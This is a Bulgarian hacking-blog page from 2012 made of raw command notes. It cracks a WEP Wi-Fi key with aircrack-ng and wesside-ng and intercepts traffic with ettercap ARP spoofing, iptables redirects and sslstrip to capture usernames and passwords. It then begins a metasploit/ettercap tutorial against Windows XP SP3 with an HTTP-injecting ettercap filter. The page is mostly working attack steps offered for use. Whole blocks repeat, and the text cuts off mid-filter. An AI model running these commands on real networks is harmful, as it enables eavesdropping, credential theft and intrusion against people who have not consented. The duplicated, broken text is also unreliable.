01001000 01100001 01100011 01101011 01100101 01110010
47:65:74:20:6c:65:61:72:6e:20:74:6f:20:68:61:63:6b
сряда, 27 юни 2012 г.
Wlan хак WEP с aircrack-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w do0ms --bssid 74:EA:3A:E3:E7:14 mon0
aireplay-ng -1 0 -a 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0
aireplay-ng -3 -b 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0
aircrack-ng -b 74:EA:3A:E3:E7:14 do0ms-01.cap
#Wessid-ng autohack
wesside-ng -i mon0 -k 1
wesside-ng -i mon0 -v 74:EA:3A:E3:E7:14
airodump-ng mon0
airodump-ng -c 11 -w do0ms --bssid 74:EA:3A:E3:E7:14 mon0
aireplay-ng -1 0 -a 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0
aireplay-ng -3 -b 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0
aircrack-ng -b 74:EA:3A:E3:E7:14 do0ms-01.cap
#Wessid-ng autohack
wesside-ng -i mon0 -k 1
wesside-ng -i mon0 -v 74:EA:3A:E3:E7:14
Lan / Wlan рутинг :)
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
ettercap -T -q -i at0
sslstrip -a -k -f
=================wifisnif==========
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar -zxvf sslstrip-0.7.tar.gz
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables --list -t nat
echo "1" > /proc/sys/net/ipv4/ip_forward
python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
===================================
podslushvane na user/pass v wlan/eth
===================================
nano /etc/etter.conf
нсталиране на най-новата версия на sslstrip -> http://www.thoughtcrime.org/software/sslstrip/
python ./setup.py install
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward // след стариране на еттер ако се промени на 0 пак се пише
iptables -t nat -A PREROUTING -i waln0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -nvL -t nat
python sslstrip-0.7/sslstrip.py -a -l 8080 или sslstrip -a -l 8080
ettercap -TqM ARP:REMOTE // //
избира се после плугина remote_browser
/etc/sysctl.conf:
net.ipv4.ip_forward = 1
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
ettercap -T -q -i at0
sslstrip -a -k -f
=================wifisnif==========
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar -zxvf sslstrip-0.7.tar.gz
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables --list -t nat
echo "1" > /proc/sys/net/ipv4/ip_forward
python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
===================================
podslushvane na user/pass v wlan/eth
===================================
nano /etc/etter.conf
нсталиране на най-новата версия на sslstrip -> http://www.thoughtcrime.org/software/sslstrip/
python ./setup.py install
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward // след стариране на еттер ако се промени на 0 пак се пише
iptables -t nat -A PREROUTING -i waln0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -nvL -t nat
python sslstrip-0.7/sslstrip.py -a -l 8080 или sslstrip -a -l 8080
ettercap -TqM ARP:REMOTE // //
избира се после плугина remote_browser
/etc/sysctl.conf:
net.ipv4.ip_forward = 1
Хакване на Windows PX SP3 с metasploit и ettercap!
Туториал за хакване на ЕксПи Сървиз пак 3 ...
Задължително отметката в Folder Options / simple file sharing да е махната !
Създава се smb.filter файл с код:
====================================================
if(ip.proto == TCP && tcp.dst == 80) {
if(search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same lenght as original string
msg("zapped Accept-Encoding!\n");
}
}
if(ip.proto == TCP && tcp.src == 80) {
replace("
Задължително отметката в Folder Options / simple file sharing да е махната !
Създава се smb.filter файл с код:
====================================================
if(ip.proto == TCP && tcp.dst == 80) {
if(search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same lenght as original string
msg("zapped Accept-Encoding!\n");
}
}
if(ip.proto == TCP && tcp.src == 80) {
replace("